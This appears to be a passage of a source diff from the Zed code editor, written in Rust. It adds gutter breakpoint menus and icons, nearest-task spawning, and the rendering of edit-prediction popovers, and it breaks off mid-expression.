debugger: Use this function to color toggle symbols that house nested breakpoints + fn active_breakpoints( + &self, + range: Range, + window: &mut Window, + cx: &mut Context, + ) -> HashMap { + let mut breakpoint_display_points = HashMap::default(); + + let Some(breakpoint_store) = self.breakpoint_store.clone() else { + return breakpoint_display_points; + }; + + let snapshot = self.snapshot(window, cx); + + let multi_buffer_snapshot = &snapshot.display_snapshot.buffer_snapshot; + let Some(project) = self.project.as_ref() else { + return breakpoint_display_points; + }; + + let range = snapshot.display_point_to_point(DisplayPoint::new(range.start, 0), Bias::Left) + ..snapshot.display_point_to_point(DisplayPoint::new(range.end, 0), Bias::Right); + + for (buffer_snapshot, range, excerpt_id) in + multi_buffer_snapshot.range_to_buffer_ranges(range) + { + let Some(buffer) = project.read_with(cx, |this, cx| { + this.buffer_for_id(buffer_snapshot.remote_id(), cx) + }) else { + continue; + }; + let breakpoints = breakpoint_store.read(cx).breakpoints( + &buffer, + Some( + buffer_snapshot.anchor_before(range.start) + ..buffer_snapshot.anchor_after(range.end), + ), + buffer_snapshot, + cx, + ); + for (anchor, breakpoint) in breakpoints { + let multi_buffer_anchor = + Anchor::in_buffer(excerpt_id, buffer_snapshot.remote_id(), *anchor); + let position = multi_buffer_anchor + .to_point(&multi_buffer_snapshot) + .to_display_point(&snapshot); + + breakpoint_display_points + .insert(position.row(), (multi_buffer_anchor, breakpoint.clone())); + } + } + + breakpoint_display_points + } + + fn breakpoint_context_menu( + &self, + anchor: Anchor, + window: &mut Window, + cx: &mut Context, + ) -> Entity { + let weak_editor = cx.weak_entity(); + let focus_handle = self.focus_handle(cx); + + let row = self + .buffer + .read(cx) + .snapshot(cx) + .summary_for_anchor::(&anchor) + .row; + + let breakpoint = self + .breakpoint_at_row(row, window, cx) + .map(|(anchor, bp)| (anchor, Arc::from(bp))); + + let log_breakpoint_msg = if breakpoint.as_ref().is_some_and(|bp| bp.1.message.is_some()) { + "Edit Log Breakpoint" + } else { + "Set Log Breakpoint" + }; + + let condition_breakpoint_msg = if breakpoint + .as_ref() + .is_some_and(|bp| bp.1.condition.is_some()) + { + "Edit Condition Breakpoint" + } else { + "Set Condition Breakpoint" + }; + + let hit_condition_breakpoint_msg = if breakpoint + .as_ref() + .is_some_and(|bp| bp.1.hit_condition.is_some()) + { + "Edit Hit Condition Breakpoint" + } else { + "Set Hit Condition Breakpoint" + }; + + let set_breakpoint_msg = if breakpoint.as_ref().is_some() { + "Unset Breakpoint" + } else { + "Set Breakpoint" + }; + + let run_to_cursor = command_palette_hooks::CommandPaletteFilter::try_global(cx) + .map_or(false, |filter| !filter.is_hidden(&DebuggerRunToCursor)); + + let toggle_state_msg = breakpoint.as_ref().map_or(None, |bp| match bp.1.state { + BreakpointState::Enabled => Some("Disable"), + BreakpointState::Disabled => Some("Enable"), + }); + + let (anchor, breakpoint) = + breakpoint.unwrap_or_else(|| (anchor, Arc::new(Breakpoint::new_standard()))); + + ui::ContextMenu::build(window, cx, |menu, _, _cx| { + menu.on_blur_subscription(Subscription::new(|| {})) + .context(focus_handle) + .when(run_to_cursor, |this| { + let weak_editor = weak_editor.clone(); + this.entry("Run to cursor", None, move |window, cx| { + weak_editor + .update(cx, |editor, cx| { + editor.change_selections(None, window, cx, |s| { + s.select_ranges([Point::new(row, 0)..Point::new(row, 0)]) + }); + }) + .ok(); + + window.dispatch_action(Box::new(DebuggerRunToCursor), cx); + }) + .separator() + }) + .when_some(toggle_state_msg, |this, msg| { + this.entry(msg, None, { + let weak_editor = weak_editor.clone(); + let breakpoint = breakpoint.clone(); + move |_window, cx| { + weak_editor + .update(cx, |this, cx| { + this.edit_breakpoint_at_anchor( + anchor, + breakpoint.as_ref().clone(), + BreakpointEditAction::InvertState, + cx, + ); + }) + .log_err(); + } + }) + }) + .entry(set_breakpoint_msg, None, { + let weak_editor = weak_editor.clone(); + let breakpoint = breakpoint.clone(); + move |_window, cx| { + weak_editor + .update(cx, |this, cx| { + this.edit_breakpoint_at_anchor( + anchor, + breakpoint.as_ref().clone(), + BreakpointEditAction::Toggle, + cx, + ); + }) + .log_err(); + } + }) + .entry(log_breakpoint_msg, None, { + let breakpoint = breakpoint.clone(); + let weak_editor = weak_editor.clone(); + move |window, cx| { + weak_editor + .update(cx, |this, cx| { + this.add_edit_breakpoint_block( + anchor, + breakpoint.as_ref(), + BreakpointPromptEditAction::Log, + window, + cx, + ); + }) + .log_err(); + } + }) + .entry(condition_breakpoint_msg, None, { + let breakpoint = breakpoint.clone(); + let weak_editor = weak_editor.clone(); + move |window, cx| { + weak_editor + .update(cx, |this, cx| { + this.add_edit_breakpoint_block( + anchor, + breakpoint.as_ref(), + BreakpointPromptEditAction::Condition, + window, + cx, + ); + }) + .log_err(); + } + }) + .entry(hit_condition_breakpoint_msg, None, move |window, cx| { + weak_editor + .update(cx, |this, cx| { + this.add_edit_breakpoint_block( + anchor, + breakpoint.as_ref(), + BreakpointPromptEditAction::HitCondition, + window, + cx, + ); + }) + .log_err(); + }) + }) + } + + fn render_breakpoint( + &self, + position: Anchor, + row: DisplayRow, + breakpoint: &Breakpoint, + cx: &mut Context, + ) -> IconButton { + // Is it a breakpoint that shows up when hovering over gutter? + let (is_phantom, collides_with_existing) = self.gutter_breakpoint_indicator.0.map_or( + (false, false), + |PhantomBreakpointIndicator { + is_active, + display_row, + collides_with_existing_breakpoint, + }| { + ( + is_active && display_row == row, + collides_with_existing_breakpoint, + ) + }, + ); + + let (color, icon) = { + let icon = match (&breakpoint.message.is_some(), breakpoint.is_disabled()) { + (false, false) => ui::IconName::DebugBreakpoint, + (true, false) => ui::IconName::DebugLogBreakpoint, + (false, true) => ui::IconName::DebugDisabledBreakpoint, + (true, true) => ui::IconName::DebugDisabledLogBreakpoint, + }; + + let color = if is_phantom { + Color::Hint + } else { + Color::Debugger + }; + + (color, icon) + }; + + let breakpoint = Arc::from(breakpoint.clone()); + + let alt_as_text = gpui::Keystroke { + modifiers: Modifiers::secondary_key(), + ..Default::default() + }; + let primary_action_text = if breakpoint.is_disabled() { + "enable" + } else if is_phantom && !collides_with_existing { + "set" + } else { + "unset" + }; + let mut primary_text = format!("Click to {primary_action_text}"); + if collides_with_existing && !breakpoint.is_disabled() { + use std::fmt::Write; + write!(primary_text, ", {alt_as_text}-click to disable").ok(); + } + let primary_text = SharedString::from(primary_text); + let focus_handle = self.focus_handle.clone(); + IconButton::new(("breakpoint_indicator", row.0 as usize), icon) + .icon_size(IconSize::XSmall) + .size(ui::ButtonSize::None) + .icon_color(color) + .style(ButtonStyle::Transparent) + .on_click(cx.listener({ + let breakpoint = breakpoint.clone(); + + move |editor, event: &ClickEvent, window, cx| { + let edit_action = if event.modifiers().platform || breakpoint.is_disabled() { + BreakpointEditAction::InvertState + } else { + BreakpointEditAction::Toggle + }; + + window.focus(&editor.focus_handle(cx)); + editor.edit_breakpoint_at_anchor( + position, + breakpoint.as_ref().clone(), + edit_action, + cx, + ); + } + })) + .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { + editor.set_breakpoint_context_menu( + row, + Some(position), + event.down.position, + window, + cx, + ); + })) + .tooltip(move |window, cx| { + Tooltip::with_meta_in( + primary_text.clone(), + None, + "Right-click for more options", + &focus_handle, + window, + cx, + ) + }) + } + + fn build_tasks_context( + project: &Entity, + buffer: &Entity, + buffer_row: u32, + tasks: &Arc, + cx: &mut Context, + ) -> Task> { + let position = Point::new(buffer_row, tasks.column); + let range_start = buffer.read(cx).anchor_at(position, Bias::Right); + let location = Location { + buffer: buffer.clone(), + range: range_start..range_start, + }; + // Fill in the environmental variables from the tree-sitter captures + let mut captured_task_variables = TaskVariables::default(); + for (capture_name, value) in tasks.extra_variables.clone() { + captured_task_variables.insert( + task::VariableName::Custom(capture_name.into()), + value.clone(), + ); + } + project.update(cx, |project, cx| { + project.task_store().update(cx, |task_store, cx| { + task_store.task_context_for_location(captured_task_variables, location, cx) + }) + }) + } + + pub fn spawn_nearest_task( + &mut self, + action: &SpawnNearestTask, + window: &mut Window, + cx: &mut Context, + ) { + let Some((workspace, _)) = self.workspace.clone() else { + return; + }; + let Some(project) = self.project.clone() else { + return; + }; + + // Try to find a closest, enclosing node using tree-sitter that has a + // task + let Some((buffer, buffer_row, tasks)) = self + .find_enclosing_node_task(cx) + // Or find the task that's closest in row-distance. + .or_else(|| self.find_closest_task(cx)) + else { + return; + }; + + let reveal_strategy = action.reveal; + let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx); + cx.spawn_in(window, async move |_, cx| { + let context = task_context.await?; + let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?; + + let resolved = &mut resolved_task.resolved; + resolved.reveal = reveal_strategy; + + workspace + .update_in(cx, |workspace, window, cx| { + workspace.schedule_resolved_task( + task_source_kind, + resolved_task, + false, + window, + cx, + ); + }) + .ok() + }) + .detach(); + } + + fn find_closest_task( + &mut self, + cx: &mut Context, + ) -> Option<(Entity, u32, Arc)> { + let cursor_row = self.selections.newest_adjusted(cx).head().row; + + let ((buffer_id, row), tasks) = self + .tasks + .iter() + .min_by_key(|((_, row), _)| cursor_row.abs_diff(*row))?; + + let buffer = self.buffer.read(cx).buffer(*buffer_id)?; + let tasks = Arc::new(tasks.to_owned()); + Some((buffer, *row, tasks)) + } + + fn find_enclosing_node_task( + &mut self, + cx: &mut Context, + ) -> Option<(Entity, u32, Arc)> { + let snapshot = self.buffer.read(cx).snapshot(cx); + let offset = self.selections.newest::(cx).head(); + let excerpt = snapshot.excerpt_containing(offset..offset)?; + let buffer_id = excerpt.buffer().remote_id(); + + let layer = excerpt.buffer().syntax_layer_at(offset)?; + let mut cursor = layer.node().walk(); + + while cursor.goto_first_child_for_byte(offset).is_some() { + if cursor.node().end_byte() == offset { + cursor.goto_next_sibling(); + } + } + + // Ascend to the smallest ancestor that contains the range and has a task. + loop { + let node = cursor.node(); + let node_range = node.byte_range(); + let symbol_start_row = excerpt.buffer().offset_to_point(node.start_byte()).row; + + // Check if this node contains our offset + if node_range.start <= offset && node_range.end >= offset { + // If it contains offset, check for task + if let Some(tasks) = self.tasks.get(&(buffer_id, symbol_start_row)) { + let buffer = self.buffer.read(cx).buffer(buffer_id)?; + return Some((buffer, symbol_start_row, Arc::new(tasks.to_owned()))); + } + } + + if !cursor.goto_parent() { + break; + } + } + None + } + + fn render_run_indicator( + &self, + _style: &EditorStyle, + is_active: bool, + row: DisplayRow, + breakpoint: Option<(Anchor, Breakpoint)>, + cx: &mut Context, + ) -> IconButton { + let color = Color::Muted; + let position = breakpoint.as_ref().map(|(anchor, _)| *anchor); + + IconButton::new(("run_indicator", row.0 as usize), ui::IconName::Play) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::XSmall) + .icon_color(color) + .toggle_state(is_active) + .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| { + let quick_launch = e.down.button == MouseButton::Left; + window.focus(&editor.focus_handle(cx)); + editor.toggle_code_actions( + &ToggleCodeActions { + deployed_from_indicator: Some(row), + quick_launch, + }, + window, + cx, + ); + })) + .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| { + editor.set_breakpoint_context_menu(row, position, event.down.position, window, cx); + })) + } + + pub fn context_menu_visible(&self) -> bool { + !self.edit_prediction_preview_is_active() + && self + .context_menu + .borrow() + .as_ref() + .map_or(false, |menu| menu.visible()) + } + + fn context_menu_origin(&self) -> Option { + self.context_menu + .borrow() + .as_ref() + .map(|menu| menu.origin()) + } + + pub fn set_context_menu_options(&mut self, options: ContextMenuOptions) { + self.context_menu_options = Some(options); + } + + const EDIT_PREDICTION_POPOVER_PADDING_X: Pixels = Pixels(24.); + const EDIT_PREDICTION_POPOVER_PADDING_Y: Pixels = Pixels(2.); + + fn render_edit_prediction_popover( + &mut self, + text_bounds: &Bounds, + content_origin: gpui::Point, + editor_snapshot: &EditorSnapshot, + visible_row_range: Range, + scroll_top: f32, + scroll_bottom: f32, + line_layouts: &[LineWithInvisibles], + line_height: Pixels, + scroll_pixel_position: gpui::Point, + newest_selection_head: Option, + editor_width: Pixels, + style: &EditorStyle, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let active_inline_completion = self.active_inline_completion.as_ref()?; + + if self.edit_prediction_visible_in_cursor_popover(true) { + return None; + } + + match &active_inline_completion.completion { + InlineCompletion::Move { target, .. } => { + let target_display_point = target.to_display_point(editor_snapshot); + + if self.edit_prediction_requires_modifier() { + if !self.edit_prediction_preview_is_active() { + return None; + } + + self.render_edit_prediction_modifier_jump_popover( + text_bounds, + content_origin, + visible_row_range, + line_layouts, + line_height, + scroll_pixel_position, + newest_selection_head, + target_display_point, + window, + cx, + ) + } else { + self.render_edit_prediction_eager_jump_popover( + text_bounds, + content_origin, + editor_snapshot, + visible_row_range, + scroll_top, + scroll_bottom, + line_height, + scroll_pixel_position, + target_display_point, + editor_width, + window, + cx, + ) + } + } + InlineCompletion::Edit { + display_mode: EditDisplayMode::Inline, + .. + } => None, + InlineCompletion::Edit { + display_mode: EditDisplayMode::TabAccept, + edits, + .. + } => { + let range = &edits.first()?.0; + let target_display_point = range.end.to_display_point(editor_snapshot); + + self.render_edit_prediction_end_of_line_popover( + "Accept", + editor_snapshot, + visible_row_range, + target_display_point, + line_height, + scroll_pixel_position, + content_origin, + editor_width, + window, + cx, + ) + } + InlineCompletion::Edit { + edits, + edit_preview, + display_mode: EditDisplayMode::DiffPopover, + snapshot, + } => self.render_edit_prediction_diff_popover( + text_bounds, + content_origin, + editor_snapshot, + visible_row_range, + line_layouts, + line_height, + scroll_pixel_position, + newest_selection_head, + editor_width, + style, + edits, + edit_preview, + snapshot, + window, + cx, + ), + } + } + + fn render_edit_prediction_modifier_jump_popover( + &mut self, + text_bounds: &Bounds, + content_origin: gpui::Point, + visible_row_range: Range, + line_layouts: &[LineWithInvisibles], + line_height: Pixels, + scroll_pixel_position: gpui::Point, + newest_selection_head: Option, + target_display_point: DisplayPoint, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let scrolled_content_origin = + content_origin - gpui::Point::new(scroll_pixel_position.x, Pixels(0.0)); + + const SCROLL_PADDING_Y: Pixels = px(12.); + + if target_display_point.row() < visible_row_range.start { + return self.render_edit_prediction_scroll_popover( + |_| SCROLL_PADDING_Y, + IconName::ArrowUp, + visible_row_range, + line_layouts, + newest_selection_head, + scrolled_content_origin, + window, + cx, + ); + } else if target_display_point.row() >= visible_row_range.end { + return self.render_edit_prediction_scroll_popover( + |size| text_bounds.size.height - size.height - SCROLL_PADDING_Y, + IconName::ArrowDown, + visible_row_range, + line_layouts, + newest_selection_head, + scrolled_content_origin, + window, + cx, + ); + } + + const POLE_WIDTH: Pixels = px(2.); + + let line_layout = + line_layouts.get(target_display_point.row().minus(visible_row_range.start) as usize)?; + let target_column = target_display_point.column() as usize; + + let target_x = line_layout.x_for_index(target_column); + let target_y = + (target_display_point.row().as_f32() * line_height) - scroll_pixel_position.y; + + let flag_on_right = target_x < text_bounds.size.width / 2.; + + let mut border_color = Self::edit_prediction_callout_popover_border_color(cx); + border_color.l += 0.001; + + let mut element = v_flex() + .items_end() + .when(flag_on_right, |el| el.items_start()) + .child(if flag_on_right { + self.render_edit_prediction_line_popover("Jump", None, window, cx)? + .rounded_bl(px(0.)) + .rounded_tl(px(0.)) + .border_l_2() + .border_color(border_color) + } else { + self.render_edit_prediction_line_popover("Jump", None, window, cx)? + .rounded_br(px(0.)) + .rounded_tr(px(0.)) + .border_r_2() + .border_color(border_color) + }) + .child(div().w(POLE_WIDTH).bg(border_color).h(line_height)) + .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + let mut origin = scrolled_content_origin + point(target_x, target_y) + - point( + if flag_on_right { + POLE_WIDTH + } else { + size.width - POLE_WIDTH + }, + size.height - line_height, + ); + + origin.x = origin.x.max(content_origin.x); + + element.prepaint_at(origin, window, cx); + + Some((element, origin)) + } + + fn render_edit_prediction_scroll_popover( + &mut self, + to_y: impl Fn(Size) -> Pixels, + scroll_icon: IconName, + visible_row_range: Range, + line_layouts: &[LineWithInvisibles], + newest_selection_head: Option, + scrolled_content_origin: gpui::Point, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let mut element = self + .render_edit_prediction_line_popover("Scroll", Some(scroll_icon), window, cx)? + .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + let cursor = newest_selection_head?; + let cursor_row_layout = + line_layouts.get(cursor.row().minus(visible_row_range.start) as usize)?; + let cursor_column = cursor.column() as usize; + + let cursor_character_x = cursor_row_layout.x_for_index(cursor_column); + + let origin = scrolled_content_origin + point(cursor_character_x, to_y(size)); + + element.prepaint_at(origin, window, cx); + Some((element, origin)) + } + + fn render_edit_prediction_eager_jump_popover( + &mut self, + text_bounds: &Bounds, + content_origin: gpui::Point, + editor_snapshot: &EditorSnapshot, + visible_row_range: Range, + scroll_top: f32, + scroll_bottom: f32, + line_height: Pixels, + scroll_pixel_position: gpui::Point, + target_display_point: DisplayPoint, + editor_width: Pixels, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + if target_display_point.row().as_f32() < scroll_top { + let mut element = self + .render_edit_prediction_line_popover( + "Jump to Edit", + Some(IconName::ArrowUp), + window, + cx, + )? + .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + let offset = point( + (text_bounds.size.width - size.width) / 2., + Self::EDIT_PREDICTION_POPOVER_PADDING_Y, + ); + + let origin = text_bounds.origin + offset; + element.prepaint_at(origin, window, cx); + Some((element, origin)) + } else if (target_display_point.row().as_f32() + 1.) > scroll_bottom { + let mut element = self + .render_edit_prediction_line_popover( + "Jump to Edit", + Some(IconName::ArrowDown), + window, + cx, + )? + .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + let offset = point( + (text_bounds.size.width - size.width) / 2., + text_bounds.size.height - size.height - Self::EDIT_PREDICTION_POPOVER_PADDING_Y, + ); + + let origin = text_bounds.origin + offset; + element.prepaint_at(origin, window, cx); + Some((element, origin)) + } else { + self.render_edit_prediction_end_of_line_popover( + "Jump to Edit", + editor_snapshot, + visible_row_range, + target_display_point, + line_height, + scroll_pixel_position, + content_origin, + editor_width, + window, + cx, + ) + } + } + + fn render_edit_prediction_end_of_line_popover( + self: &mut Editor, + label: &'static str, + editor_snapshot: &EditorSnapshot, + visible_row_range: Range, + target_display_point: DisplayPoint, + line_height: Pixels, + scroll_pixel_position: gpui::Point, + content_origin: gpui::Point, + editor_width: Pixels, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let target_line_end = DisplayPoint::new( + target_display_point.row(), + editor_snapshot.line_len(target_display_point.row()), + ); + + let mut element = self + .render_edit_prediction_line_popover(label, None, window, cx)? + .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + let line_origin = self.display_to_pixel_point(target_line_end, editor_snapshot, window)?; + + let start_point = content_origin - point(scroll_pixel_position.x, Pixels::ZERO); + let mut origin = start_point + + line_origin + + point(Self::EDIT_PREDICTION_POPOVER_PADDING_X, Pixels::ZERO); + origin.x = origin.x.max(content_origin.x); + + let max_x = content_origin.x + editor_width - size.width; + + if origin.x > max_x { + let offset = line_height + Self::EDIT_PREDICTION_POPOVER_PADDING_Y; + + let icon = if visible_row_range.contains(&(target_display_point.row() + 2)) { + origin.y += offset; + IconName::ArrowUp + } else { + origin.y -= offset; + IconName::ArrowDown + }; + + element = self + .render_edit_prediction_line_popover(label, Some(icon), window, cx)? + .into_any(); + + let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + origin.x = content_origin.x + editor_width - size.width - px(2.); + } + + element.prepaint_at(origin, window, cx); + Some((element, origin)) + } + + fn render_edit_prediction_diff_popover( + self: &Editor, + text_bounds: &Bounds, + content_origin: gpui::Point, + editor_snapshot: &EditorSnapshot, + visible_row_range: Range, + line_layouts: &[LineWithInvisibles], + line_height: Pixels, + scroll_pixel_position: gpui::Point, + newest_selection_head: Option, + editor_width: Pixels, + style: &EditorStyle, + edits: &Vec<(Range, String)>, + edit_preview: &Option, + snapshot: &language::BufferSnapshot, + window: &mut Window, + cx: &mut App, + ) -> Option<(AnyElement, gpui::Point)> { + let edit_start = edits + .first() + .unwrap() + .0 + .start + .to_display_point(editor_snapshot); + let edit_end = edits + .last() + .unwrap() + .0 + .end + .to_display_point(editor_snapshot); + + let is_visible = visible_row_range.contains(&edit_start.row()) + || visible_row_range.contains(&edit_end.row()); + if !is_visible { + return None; + } + + let highlighted_edits = + crate::inline_completion_edit_text(&snapshot, edits, edit_preview.as_ref()?, false, cx); + + let styled_text = highlighted_edits.to_styled_text(&style.text); + let line_count = highlighted_edits.text.lines().count(); + + const BORDER_WIDTH: Pixels = px(1.); + + let keybind = self.render_edit_prediction_accept_keybind(window, cx); + let has_keybind = keybind.is_some(); + + let mut element = h_flex() + .items_start() + .child( + h_flex() + .bg(cx.theme().colors().editor_background) + .border(BORDER_WIDTH) + .shadow_sm() + .border_color(cx.theme().colors().border) + .rounded_l_lg() + .when(line_count > 1, |el| el.rounded_br_lg()) + .pr_1() + .child(styled_text), + ) + .child( + h_flex() + .h(line_height + BORDER_WIDTH * 2.) + .px_1p5() + .gap_1() + // Workaround: For some reason, there's a gap if we don't do this + .ml(-BORDER_WIDTH) + .shadow(vec![gpui::BoxShadow { + color: gpui::black().opacity(0.05), + offset: point(px(1.), px(1.)), + blur_radius: px(2.), + spread_radius: px(0.), + }]) + .bg(Editor::edit_prediction_line_popover_bg_color(cx)) + .border(BORDER_WIDTH) + .border_color(cx.theme().colors().border) + .rounded_r_lg() + .id("edit_prediction_diff_popover_keybind") + .when(!has_keybind, |el| { + let status_colors = cx.theme().status(); + + el.bg(status_colors.error_background) + .border_color(status_colors.error.opacity(0.6)) + .child(Icon::new(IconName::Info).color(Color::Error)) + .cursor_default() + .hoverable_tooltip(move |_window, cx| { + cx.new(|_| MissingEditPredictionKeybindingTooltip).into() + }) + }) + .children(keybind), + ) + .into_any(); + + let longest_row = + editor_snapshot.longest_row_in_range(edit_start.row()..edit_end.row() + 1); + let longest_line_width = if visible_row_range.contains(&longest_row) { + line_layouts[(longest_row.0 - visible_row_range.start.0) as usize].width + } else { + layout_line( + longest_row, + editor_snapshot, + style, + editor_width, + |_| false, + window, + cx, + ) + .width + }; + + let viewport_bounds = + Bounds::new(Default::default(), window.viewport_size()).extend(Edges { + right: -EditorElement::SCROLLBAR_WIDTH, + ..Default::default() + }); + + let x_after_longest = + text_bounds.origin.x + longest_line_width + Self::EDIT_PREDICTION_POPOVER_PADDING_X + - scroll_pixel_position.x; + + let element_bounds = element.layout_as_root(AvailableSpace::min_size(), window, cx); + + // Fully visible if it can be displayed within the window (allow overlapping other + // panes). However, this is only allowed if the popover starts within text_bounds. + let can_position_to_the_right = x_after_longest < text_bounds.right() + && x_after_longest + element_bounds.width < viewport_bounds.right(); + + let mut origin = if can_position_to_the_right { + point( + x_after_longest, + text_bounds.origin.y + edit_start.row().as_f32() * line_height + - scroll_pixel_position.y, + ) + } else { + let cursor_row = newest_selection_head.map(|head| head.row()); + let above_edit = edit_start + .row() + .0 + .checked_sub(line_count as u32) + .map(DisplayRow); + let below_edit = Some(edit_end.row() + 1); + let above_cursor = + cursor_row.and_then(|row| row.0.checked_sub(line_count as u32).map(DisplayRow)); + let below_cursor = cursor_row.map(|cursor_row| cursor_row + 1); + + // Place the edit popover adjacent to the edit if there is a location + // available that is onscreen and does not obscure the cursor. Otherwise, + // place it adjacent to the cursor. + let row_target = [above_edit, below_edit, above_cursor, below_cursor] + .into_iter() + .flatten() + .find(|&start_row| { + let end_row = start_row + line_count as u32; + visible_row_range.contains(&start_row) + && visible_row_range.contains(&end_row) + && cursor_row.map_or(true, |cursor_row| { + !((start_row..end_row).contains(&cursor_row)) + }) + })?; + + content_origin + + point( + -scroll_pixel_position.x, + row_target.as_f32() * line_height - scroll_pixel_position.y, + ) + }; + + origin.x -= BORDER_WIDTH; + + window.defer_draw(element, origin, 1); + + // Do not return an element, since it will already be drawn due to defer_draw. + None + } + + fn edit_prediction_cursor_popover_height(&self) -> Pixels { + px(30.) + } + + fn current_user_player_color(&self, cx: &mut App) -> PlayerColor { + if self.read_only(cx) { + cx.theme().players().read_only() + } else { + self.style.as_ref().unwrap().local_player + } + } + + fn render_edit_prediction_accept_keybind( + &self, + window: &mut Window, + cx: &App, + ) -> Option { + let accept_binding = self.accept_edit_prediction_keybind(window, cx); + let accept_keystroke = accept_binding.keystroke()?; + + let is_platform_style_mac = PlatformStyle::platform() == PlatformStyle::Mac; + + let modifiers_color = if accept_keystroke.modifiers == window.modifiers() { + Color::Accent + } else { + Color::Muted + }; + + h_flex() + .px_0p5() + .when(is_platform_style_mac, |parent| parent.gap_0p5()) + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) + .text_size(TextSize::XSmall.rems(cx)) + .child(h_flex().children(ui::render_modifiers( + &accept_keystroke.modifiers, + PlatformStyle::platform(), + Some(modifiers_color), + Some(IconSize::XSmall.rems().into()), + true, + ))) + .when(is_platform_style_mac, |parent| { + parent.child(accept_keystroke.key.clone()) + }) + .when(!is_platform_style_mac, |parent| { + parent.child( + Key::new( + util::capitalize(&accept_keystroke.key), + Some(Color::Default), + ) + .size(Some(IconSize::XSmall.rems().into())), + ) + }) + .into_any() + .into() + } + + fn render_edit_prediction_line_popover( + &self, + label: impl Into, + icon: Option, + window: &mut Window, + cx: &App, + ) -> Option> { + let padding_right = if icon.is_some() { px(4.) } else { px(8.) }; + + let keybind = self.render_edit_prediction_accept_keybind(window, cx); + let has_keybind = keybind.is_some(); + + let result = h_flex() + .id("ep-line-popover") + .py_0p5() + .pl_1() + .pr(padding_right) + .gap_1() + .rounded_md() + .border_1() + .bg(Self::edit_prediction_line_popover_bg_color(cx)) + .border_color(Self::edit_prediction_callout_popover_border_color(cx)) + .shadow_sm() + .when(!has_keybind, |el| { + let status_colors = cx.theme().status(); + + el.bg(status_colors.error_background) + .border_color(status_colors.error.opacity(0.6)) + .pl_2() + .child(Icon::new(IconName::ZedPredictError).color(Color::Error)) + .cursor_default() + .hoverable_tooltip(move |_window, cx| { + cx.new(|_| MissingEditPredictionKeybindingTooltip).into() + }) + }) + .children(keybind) + .child( + Label::new(label) + .size(LabelSize::Small) + .when(!has_keybind, |el| { + el.color(cx.theme().status().error.into()).strikethrough() + }), + ) + .when(!has_keybind, |el| { + el.child( + h_flex().ml_1().child( + Icon::new(IconName::Info) + .size(IconSize::Small) + .color(cx.theme().status().error.into()), + ), + ) + }) + .when_some(icon, |element, icon| { + element.child( + div() + .mt(px(1.5)) + .child(Icon::new(icon).size(IconSize::Small)), + ) + }); + + Some(result) + } + + fn edit_prediction_line_popover_bg_color(cx: &App) -> Hsla { + let accent_color = cx.theme().colors().text_accent; + let editor_bg_color = cx.theme().colors().editor_background; + editor_bg_color.blend(accent_color.opacity(0.1)) + } + + fn edit_prediction_callout_popover_border_color(cx: &App) -> Hsla { + let accent_color = cx.theme().colors().text_accent; + let editor_bg_color = cx.theme().colors().editor_background; + editor_bg_color.blend(accent_color.opacity(0.6)) + } + + fn render_edit_prediction_cursor_popover( + &self, + min_width: Pixels, + max_width: Pixels, + cursor_point: Point, + style: &EditorStyle, + accept_keystroke: Option<&gpui::Keystroke>, + _window: &Window, + cx: &mut Context, + ) -> Option { + let provider = self.edit_prediction_provider.as_ref()?; + + if provider.provider.needs_terms_acceptance(cx) { + return Some( + h_flex() + .min_w(min_width) + .flex_1() + .px_2() + .py_1() + .gap_3() + .elevation_2(cx) + .hover(|style| style.bg(cx.theme().colors().element_hover)) + .id("accept-terms") + .cursor_pointer() + .on_mouse_down(MouseButton::Left, |_, window, _| window.prevent_default()) + .on_click(cx.listener(|this, _event, window, cx| { + cx.stop_propagation(); + this.report_editor_event("Edit Prediction Provider ToS Clicked", None, cx); + window.dispatch_action( + zed_actions::OpenZedPredictOnboarding.boxed_clone(), + cx, + ); + })) + .child( + h_flex() + .flex_1() + .gap_2() + .child(Icon::new(IconName::ZedPredict)) + .child(Label::new("Accept Terms of Service")) + .child(div().w_full()) + .child( + Icon::new(IconName::ArrowUpRight) + .color(Color::Muted) + .size(IconSize::Small), + ) + .into_any_element(), + ) + .into_any(), + ); + } + + let is_refreshing = provider.provider.is_refreshing(cx); + + fn pending_completion_container() -> Div { + h_flex() + .h_full() + .flex_1() + .gap_2() + .child(Icon::new(IconName::ZedPredict)) + } + + let completion = match &self.active_inline_completion { + Some(prediction) => { + if !self.has_visible_completions_menu() { + const RADIUS: Pixels = px(6.); + const BORDER_WIDTH: Pixels = px(1.); + + return Some( + h_flex() + .elevation_2(cx) + .border(BORDER_WIDTH) + .border_color(cx.theme().colors().border) + .when(accept_keystroke.is_none(), |el| { + el.border_color(cx.theme().status().error) + }) + .rounded(RADIUS) + .rounded_tl(px(0.)) + .overflow_hidden() + .child(div().px_1p5().child(match &prediction.completion { + InlineCompletion::Move { target, snapshot } => { + use text::ToPoint as _; + if target.text_anchor.to_point(&snapshot).row > cursor_point.row + { + Icon::new(IconName::ZedPredictDown) + } else { + Icon::new(IconName::ZedPredictUp) + } + } + InlineCompletion::Edit { .. } => Icon::new(IconName::ZedPredict), + })) + .child( + h_flex() + .gap_1() + .py_1() + .px_2() + .rounded_r(RADIUS - BORDER_WIDTH) + .border_l_1() + .border_color(cx.theme().colors().border) + .bg(Self::edit_prediction_line_popover_bg_color(cx)) + .when(self.edit_prediction_preview.released_too_fast(), |el| { + el.child( + Label::new("Hold") + .size(LabelSize::Small) + .when(accept_keystroke.is_none(), |el| { + el.strikethrough() + }) + 